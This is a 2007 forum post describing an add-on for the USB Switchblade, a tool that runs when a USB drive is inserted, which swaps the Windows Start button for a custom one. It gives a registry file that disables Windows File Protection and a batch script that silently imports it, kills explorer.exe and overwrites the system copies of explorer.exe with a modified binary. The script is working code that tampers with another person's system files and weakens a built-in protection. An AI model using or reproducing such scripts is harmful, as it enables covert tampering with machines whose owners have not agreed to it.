AndyzBong Posted January 7, 2007 Share Posted January 7, 2007 I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button. NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue. MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER! You will need 4 things (these all go in WIPCMD): 1. A registry file to import a key that disables Windows File Protection 2. A modified version of explorer.exe 3. A batch file to delay time when copying the modified explorer 4. A copy of Pskill First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "SFCDisable"=dword:000001 [HKEY_CURRENT_USERSoftwareSysinternalsPsKill] "EulaAccepted"=dword:00000001 Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify it's start button to whatever you want. Save the changes to explorer.exe Then create a batch file named blank.bat and a batch file named explorer.bat Blank.bat will be blank (duh), and explorer.bat will have the following code: @echo off regedit.exe /s WIPCMDwfpskill.reg pskill.exe explorer.exe RENAME C:WINDOWSsystem32dllcacheexplorer.exe explorer.bak COPY /y F:WIPCMDexplorer.exe C:WINDOWSsystem32dllcache TYPE NUL | F:WIPCMDblank.bat /N /CY /TY,5 >NUL COPY /y F:WIPCMDexplorer.exe C:WINDOWS C:WINDOWSexplorer.exe exit Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go. This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries. Mad props to KarmikTrance. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.